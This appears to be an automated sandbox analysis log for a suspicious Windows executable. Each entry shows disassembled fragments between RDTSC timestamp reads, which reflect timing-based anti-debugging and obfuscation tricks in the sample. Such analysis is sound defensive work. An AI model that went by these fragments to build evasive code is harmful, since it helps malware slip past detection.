Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 373578 second address: 37359E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4688C929E4h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jl 00007F4688C929DCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37359E second address: 3735A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37578E second address: 375796 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3727FB second address: 3727FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 375796 second address: 3757A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3732DF second address: 3732E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3757A4 second address: 3757A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3732E5 second address: 3732EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F4688C1B766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37AA49 second address: 37AA4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37AA4E second address: 37AA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C1B778h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37AA73 second address: 37AA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C929DCh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37AF93 second address: 37AFE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F4688C1B768h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D3A74h] 0x0000002a push 00000000h 0x0000002c mov di, cx 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 jnc 00007F4688C1B776h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37BDEC second address: 37BE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 jc 00007F4688C929EAh 0x0000000c pushad 0x0000000d jmp 00007F4688C929DCh 0x00000012 jnc 00007F4688C929D6h 0x00000018 popad 0x00000019 nop 0x0000001a add dword ptr [ebp+122D38AEh], eax 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007F4688C929D8h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 0000001Dh 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c cmc 0x0000003d mov bx, di 0x00000040 push 00000000h 0x00000042 or edi, 539C45E0h 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37B149 second address: 37B14E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37BE4C second address: 37BE51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37B14E second address: 37B153 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37BF9C second address: 37BFA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F4688C929D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37D103 second address: 37D10D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F4688C1B766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37DFD9 second address: 37E043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F4688C929E9h 0x0000000d jg 00007F4688C929D8h 0x00000013 popad 0x00000014 nop 0x00000015 or dword ptr [ebp+122D2828h], edx 0x0000001b mov bh, E6h 0x0000001d push 00000000h 0x0000001f jnc 00007F4688C929DCh 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007F4688C929D8h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 00000016h 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 movsx edi, si 0x00000044 push eax 0x00000045 push ecx 0x00000046 push eax 0x00000047 push edx 0x00000048 push edx 0x00000049 pop edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37F02F second address: 37F035 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 37F035 second address: 37F04D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C929E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 38240F second address: 382441 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F4688C1B76Fh 0x0000000d jmp 00007F4688C1B76Eh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 je 00007F4688C1B766h 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 382441 second address: 38246F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E8h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F4688C929E0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 383A60 second address: 383A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 384BE6 second address: 384BEC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 383C89 second address: 383C9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4688C1B76Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 385CC7 second address: 385D00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F4688C929E2h 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F4688C929D6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 384E1C second address: 384EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edi, edx 0x0000000a push dword ptr fs:[00000000h] 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F4688C1B768h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007F4688C1B768h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 0000001Ah 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c adc bl, FFFFFFE6h 0x0000004f mov eax, dword ptr [ebp+122D0995h] 0x00000055 stc 0x00000056 push FFFFFFFFh 0x00000058 call 00007F4688C1B778h 0x0000005d jmp 00007F4688C1B76Ah 0x00000062 pop ebx 0x00000063 push eax 0x00000064 push esi 0x00000065 push eax 0x00000066 push edx 0x00000067 jng 00007F4688C1B766h 0x0000006d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 386CB6 second address: 386CC0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 388AB0 second address: 388AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F4688C1B768h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 xor ebx, 5F64974Fh 0x00000029 push 00000000h 0x0000002b mov di, dx 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+12454D8Eh], edi 0x00000036 mov edi, 719258C0h 0x0000003b xchg eax, esi 0x0000003c pushad 0x0000003d pushad 0x0000003e pushad 0x0000003f popad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 389B5D second address: 389B73 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f je 00007F4688C929D6h 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 385E9F second address: 385F40 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4688C1B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b nop 0x0000000c or dword ptr [ebp+12449AABh], ebx 0x00000012 push dword ptr fs:[00000000h] 0x00000019 jmp 00007F4688C1B775h 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push ebp 0x00000028 call 00007F4688C1B768h 0x0000002d pop ebp 0x0000002e mov dword ptr [esp+04h], ebp 0x00000032 add dword ptr [esp+04h], 0000001Dh 0x0000003a inc ebp 0x0000003b push ebp 0x0000003c ret 0x0000003d pop ebp 0x0000003e ret 0x0000003f mov bx, 70B8h 0x00000043 mov eax, dword ptr [ebp+122D06B1h] 0x00000049 push 00000000h 0x0000004b push ebp 0x0000004c call 00007F4688C1B768h 0x00000051 pop ebp 0x00000052 mov dword ptr [esp+04h], ebp 0x00000056 add dword ptr [esp+04h], 00000019h 0x0000005e inc ebp 0x0000005f push ebp 0x00000060 ret 0x00000061 pop ebp 0x00000062 ret 0x00000063 push FFFFFFFFh 0x00000065 or dword ptr [ebp+12461125h], ebx 0x0000006b mov edi, dword ptr [ebp+122D3ACCh] 0x00000071 push eax 0x00000072 pushad 0x00000073 push edi 0x00000074 ja 00007F4688C1B766h 0x0000007a pop edi 0x0000007b push eax 0x0000007c push edx 0x0000007d push ecx 0x0000007e pop ecx 0x0000007f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 389CE0 second address: 389CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 389CE6 second address: 389CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F4688C1B76Ch 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 38C88B second address: 38C895 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F4688C929D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 389CFE second address: 389D08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F4688C1B766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 38C895 second address: 38C901 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b sub dword ptr [ebp+122D3628h], edx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F4688C929D8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov ebx, 1DB538E4h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F4688C929D8h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 00000018h 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e push eax 0x0000004f jo 00007F4688C929E4h 0x00000055 push eax 0x00000056 push edx 0x00000057 jns 00007F4688C929D6h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 38ABFC second address: 38AC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 32C010 second address: 32C01D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 32C01D second address: 32C023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 32C023 second address: 32C037 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 32C037 second address: 32C03B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 393861 second address: 393865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 39399C second address: 3939B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4688C1B774h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3939B4 second address: 3939C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007F4688C929DAh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3939C6 second address: 3939CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3939CC second address: 3939D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3939D2 second address: 3939D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3939D6 second address: 3939EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jg 00007F4688C929D6h 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3939EC second address: 3939F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3939F2 second address: 393A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007F4688C929E2h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 393B24 second address: 393B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 jmp 00007F4688C1B775h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 393B45 second address: 393B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F4688C929DFh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3982FD second address: 398301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 398301 second address: 398329 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4688C929E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F4688C929DAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 39B67C second address: 39B686 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4688C1B766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 39B686 second address: 39B697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4688C929DDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 39B73D second address: 39B743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 39B816 second address: 1CEE86 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4688C929D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xor dword ptr [esp], 233A3087h 0x00000012 pushad 0x00000013 mov edx, eax 0x00000015 jmp 00007F4688C929E9h 0x0000001a popad 0x0000001b push dword ptr [ebp+122D02D1h] 0x00000021 cmc 0x00000022 call dword ptr [ebp+122D34DBh] 0x00000028 pushad 0x00000029 mov dword ptr [ebp+122D1AD8h], ecx 0x0000002f xor eax, eax 0x00000031 cld 0x00000032 mov edx, dword ptr [esp+28h] 0x00000036 jmp 00007F4688C929E9h 0x0000003b mov dword ptr [ebp+122D3B28h], eax 0x00000041 add dword ptr [ebp+122D1AD8h], ebx 0x00000047 mov esi, 0000003Ch 0x0000004c mov dword ptr [ebp+122D1AD8h], esi 0x00000052 mov dword ptr [ebp+122D1AD8h], esi 0x00000058 add esi, dword ptr [esp+24h] 0x0000005c clc 0x0000005d lodsw 0x0000005f clc 0x00000060 add eax, dword ptr [esp+24h] 0x00000064 or dword ptr [ebp+122D1AD8h], ebx 0x0000006a mov ebx, dword ptr [esp+24h] 0x0000006e jmp 00007F4688C929DCh 0x00000073 nop 0x00000074 pushad 0x00000075 push edx 0x00000076 jmp 00007F4688C929DAh 0x0000007b pop edx 0x0000007c push eax 0x0000007d push edx 0x0000007e jmp 00007F4688C929E8h 0x00000083 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A08F2 second address: 3A08F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A08F8 second address: 3A08FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A08FE second address: 3A0902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A01DA second address: 3A01E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A0630 second address: 3A063A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F4688C1B766h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A063A second address: 3A063E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A505B second address: 3A5060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A5060 second address: 3A5066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A5066 second address: 3A506A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A506A second address: 3A508B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F4688C929E7h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A508B second address: 3A5095 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4688C1B76Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A5095 second address: 3A509D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3A509D second address: 3A50A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\gNo9ad9KO4.exe	RDTSC instruction interceptor: First address: 3769FA second address: 35737C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F4688C929D8h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 00000017h 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 mov ecx, esi 0x00000023 lea eax, dword ptr [ebp+1247B77Fh] 0x00000029 mov dword ptr [ebp+122D2384h], ecx 0x0000002f mov dx, 068Ch 0x00000033 push eax 0x00000034 push esi 0x00000035 ja 00007F4688C929DCh 0x0000003b pop esi 0x0000003c mov dword ptr [esp], eax 0x0000003f and di, 3862h 0x00000044 xor dword ptr [ebp+1243E974h], ebx 0x0000004a call dword ptr [ebp+122D1A32h] 0x00000050 push eax 0x00000051 push edx 0x00000052 jno 00007F4688C929D8h 0x00000058 jmp 00007F4688C929E4h 0x0000005d rdtsc
